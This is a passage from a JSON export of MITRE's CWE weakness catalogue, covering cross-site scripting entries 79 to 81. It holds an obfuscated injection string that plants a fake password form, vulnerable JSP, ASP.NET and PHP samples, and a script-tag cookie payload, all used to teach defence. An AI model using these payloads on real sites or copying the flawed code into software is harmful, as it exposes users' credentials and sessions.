0022\\\\u0020\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u003D\\\\u0022\\\\u0070\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u0022\\\\u0020\\\\u002F\\\\u003E\\\\u003C\\\\u0069\\\\u006E\\\\u0070\\\\u0075\\\\u0074\\\\u0020\\\\u0074\\\\u0079\\\\u0070\\\\u0065\\\\u003D\\\\u0022\\\\u0073\\\\u0075\\\\u0062\\\\u006D\\\\u0069\\\\u0074\\\\u0022\\\\u0020\\\\u0076\\\\u0061\\\\u006C\\\\u0075\\\\u0065\\\\u003D\\\\u0022\\\\u004C\\\\u006F\\\\u0067\\\\u0069\\\\u006E\\\\u0022\\\\u0020\\\\u002F\\\\u003E\\\\u003C\\\\u002F\\\\u0066\\\\u006F\\\\u0072\\\\u006D\\\\u003E\\\\u003C\\\\u002F\\\\u0064\\\\u0069\\\\u0076\\\\u003E\\\\u000D\');&lt;/script&gt;","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","",""]}}],"Body_Text":["Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as","This results in a harmless alert dialog popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.","More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user\'s password to the attacker:","If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user\'s browser:","The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):","The same attack string could also be obfuscated as:","Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs."]},{"Intro_Text":"This example also displays a Reflected XSS (Type 1) scenario.","Body_Text":["The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.","The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.","The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;% String eid = request.getParameter(\\"eid\\"); %&gt;...Employee ID: &lt;%= eid %&gt;","xhtml:br":["",""]}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"&lt;%protected System.Web.UI.WebControls.TextBox Login;protected System.Web.UI.WebControls.Label EmployeeID;...EmployeeID.Text = Login.Text;%&gt;&lt;p&gt;&lt;asp:label id=\\"EmployeeID\\" runat=\\"server\\" /&gt;&lt;/p&gt;","xhtml:br":["","","","","","",""]}}]},{"Intro_Text":"This example covers a Stored XSS (Type 2) scenario.","Body_Text":["The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee\'s name.","The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.","This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user\'s web browser."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;%Statement stmt = conn.createStatement();ResultSet rs = stmt.executeQuery(\\"select * from emp where id=\\"+eid);if (rs != null) {}%&gt;Employee Name: &lt;%= name %&gt;","xhtml:br":["","","",""],"xhtml:div":{"#text":"rs.next();String name = rs.getString(\\"name\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"&lt;%protected System.Web.UI.WebControls.Label EmployeeName;...string query = \\"select * from emp where id=\\" + eid;sda = new SqlDataAdapter(query, conn);sda.Fill(dt);string name = dt.Rows[0][\\"Name\\"];...EmployeeName.Text = name;%&gt;&lt;p&gt;&lt;asp:label id=\\"EmployeeName\\" runat=\\"server\\" /&gt;&lt;/p&gt;","xhtml:br":["","","","","","","","",""]}}]},{"Intro_Text":"The following example consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.","Body_Text":["CreateUser.php","The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:","ListUsers.php","The attacker can set their name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$username = mysql_real_escape_string($username);$fullName = mysql_real_escape_string($fullName);$query = sprintf(\'Insert Into users (username,password) Values (\\"%s\\",\\"%s\\",\\"%s\\")\', $username, crypt($password),$fullName) ;mysql_query($query);/.../","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$query = \'Select * From users Where loggedIn=true\';$results = mysql_query($query);if (!$results) {}echo \'&lt;div id=\\"userlist\\"&gt;Currently Active Users:\';while ($row = mysql_fetch_assoc($results)) {}echo \'&lt;/div&gt;\';","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"exit;","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'&lt;div class=\\"userNames\\"&gt;\'.$row[\'fullname\'].\'&lt;/div&gt;\';","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"//Print list of users to page"}}]},{"Intro_Text":"Consider an application that provides a simplistic message board that saves messages in HTML format and appends them to a file.  When a new user arrives in the room, it makes an announcement:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$name = $_COOKIE[\\"myname\\"];$announceStr = \\"$name just logged in.\\";saveMessage($announceStr);","xhtml:br":["","","",""],"xhtml:i":"//save HTML-formatted message to file; implementation details are irrelevant for this example."}},{"attr":{"@_Nature":"attack"},"xhtml:div":"&lt;script&gt;document.alert(\'Hacked\');&lt;/script&gt;"},{"attr":{"@_Nature":"result"},"xhtml:div":"&lt;script&gt;document.alert(\'Hacked\');&lt;/script&gt; has logged in."}],"Body_Text":["An attacker may be able to perform an HTML injection (Type 2 XSS) attack by setting a cookie to a value like:","The raw contents of the message file would look like:","For each person who visits the message page, their browser would execute the script, generating a pop-up window that says \\"Hacked\\". More malicious attacks are possible; see the rest of this entry."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-8958","Description":"Admin GUI allows XSS through cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8958"},{"Reference":"CVE-2017-9764","Description":"Web stats program allows XSS through crafted HTTP header.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9764"},{"Reference":"CVE-2014-5198","Description":"Web log analysis product allows XSS through crafted HTTP Referer header.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5198"},{"Reference":"CVE-2008-5080","Description":"Chain: protection mechanism failure allows XSS","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5080"},{"Reference":"CVE-2006-4308","Description":"Chain: incomplete denylist (CWE-184) only checks \\"javascript:\\" tag, allowing XSS (CWE-79) using other tags","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4308"},{"Reference":"CVE-2007-5727","Description":"Chain: incomplete denylist (CWE-184) only removes SCRIPT tags, enabling XSS (CWE-79)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5727"},{"Reference":"CVE-2008-5770","Description":"Reflected XSS using the PATH_INFO in a URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5770"},{"Reference":"CVE-2008-4730","Description":"Reflected XSS not properly handled when generating an error message","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4730"},{"Reference":"CVE-2008-5734","Description":"Reflected XSS sent through email message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5734"},{"Reference":"CVE-2008-0971","Description":"Stored XSS in a security product.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0971"},{"Reference":"CVE-2008-5249","Description":"Stored XSS using a wiki page.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5249"},{"Reference":"CVE-2006-3568","Description":"Stored XSS in a guestbook application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3568"},{"Reference":"CVE-2006-3211","Description":"Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3211"},{"Reference":"CVE-2006-3295","Description":"Chain: library file is not protected against a direct request (CWE-425), leading to reflected XSS (CWE-79).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3295"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Cross-site scripting (XSS)"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Cross-site Scripting"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Cross-site scripting"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A1","Entry_Name":"Cross Site Scripting (XSS)","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A4","Entry_Name":"Cross-Site Scripting (XSS) Flaws","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":8,"Entry_Name":"Cross-site Scripting"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-79"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"209"}},{"attr":{"@_CAPEC_ID":"588"}},{"attr":{"@_CAPEC_ID":"591"}},{"attr":{"@_CAPEC_ID":"592"}},{"attr":{"@_CAPEC_ID":"63"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-709"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting).&#34; Page 31"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 3: Web-Client Related Vulnerabilities (XSS).&#34; Page 63"}},{"attr":{"@_External_Reference_ID":"REF-712"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 13, &#34;Web-Specific Input Issues&#34; Page 413"}},{"attr":{"@_External_Reference_ID":"REF-714"}},{"attr":{"@_External_Reference_ID":"REF-715"}},{"attr":{"@_External_Reference_ID":"REF-716"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-718"}},{"attr":{"@_External_Reference_ID":"REF-719"}},{"attr":{"@_External_Reference_ID":"REF-720"}},{"attr":{"@_External_Reference_ID":"REF-721"}},{"attr":{"@_External_Reference_ID":"REF-722"}},{"attr":{"@_External_Reference_ID":"REF-723"}},{"attr":{"@_External_Reference_ID":"REF-724"}},{"attr":{"@_External_Reference_ID":"REF-725"}},{"attr":{"@_External_Reference_ID":"REF-726"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;Cross Site Scripting&#34;, Page 1071"}},{"attr":{"@_External_Reference_ID":"REF-956"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-79"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":"There can be a close relationship between XSS and CSRF (CWE-352).  An attacker might use CSRF in order to trick the victim into submitting requests to the server in which the requests contain an XSS payload.  A well-known example of this was the Samy worm on MySpace [REF-956]. The worm used XSS to insert malicious HTML sequences into a user\'s profile and add the attacker as a MySpace friend.  MySpace friends of that victim would then execute the payload to modify their own profiles, causing the worm to propagate exponentially. Since the victims did not intentionally insert the malicious script themselves, CSRF was a root cause."},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"XSS flaws are very common in web applications, since they require a great deal of developer discipline to avoid them."}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Description, Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, Observed_Examples, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Cross-site Scripting (XSS)","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Directives in a Web Page (aka \'Cross-site scripting\' (XSS))","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Preserve Web Page Structure (aka \'Cross-site Scripting\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Preserve Web Page Structure (\'Cross-site Scripting\')","attr":{"@_Date":"2010-06-21"}}]}},"80":{"attr":{"@_ID":"80","@_Name":"Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as \\"&lt;\\", \\"&gt;\\", and \\"&amp;\\" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.","Extended_Description":"This may allow such characters to be treated as control characters, which are executed client-side in the context of the user\'s session. Although this can be classified as an injection problem, the more pertinent issue is the improper conversion of such special characters to respective context-appropriate entities before displaying them to the user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, a guestbook comment isn\'t properly encoded, filtered, or otherwise neutralized for script-related tags before being displayed in a client browser.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;% for (Iterator i = guestbook.iterator(); i.hasNext(); ) {","xhtml:div":{"#text":"Entry e = (Entry) i.next(); %&gt;&lt;p&gt;Entry #&lt;%= e.getId() %&gt;&lt;/p&gt;&lt;p&gt;&lt;%= e.getText() %&gt;&lt;/p&gt;&lt;%} %&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0938","Description":"XSS in parameter in a link.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0938"},{"Reference":"CVE-2002-1495","Description":"XSS in web-based email product via attachment filenames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1495"},{"Reference":"CVE-2003-1136","Description":"HTML injection in posted message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1136"},{"Reference":"CVE-2004-2171","Description":"XSS not quoted in error page.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2171"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Basic XSS"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"18"}},{"attr":{"@_CAPEC_ID":"193"}},{"attr":{"@_CAPEC_ID":"32"}},{"attr":{"@_CAPEC_ID":"86"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Description, Name"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Basic XSS","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Script-Related HTML Tags in a Web Page (Basic XSS)","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Script-Related HTML Tags in a Web Page (Basic XSS)","attr":{"@_Date":"2010-06-21"}}]}},"81":{"attr":{"@_ID":"81","@_Name":"Improper Neutralization of Script in an Error Message Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters that could be interpreted as web-scripting elements when they are sent to an error page.","Extended_Description":{"xhtml:p":["Error pages may include customized 403 Forbidden or 404 Not Found pages.","When an attacker can trigger an error that contains script syntax within the attacker\'s input, then cross-site scripting attacks may be possible."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"209","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"390","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Do not write user-controlled input to error pages."},{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all 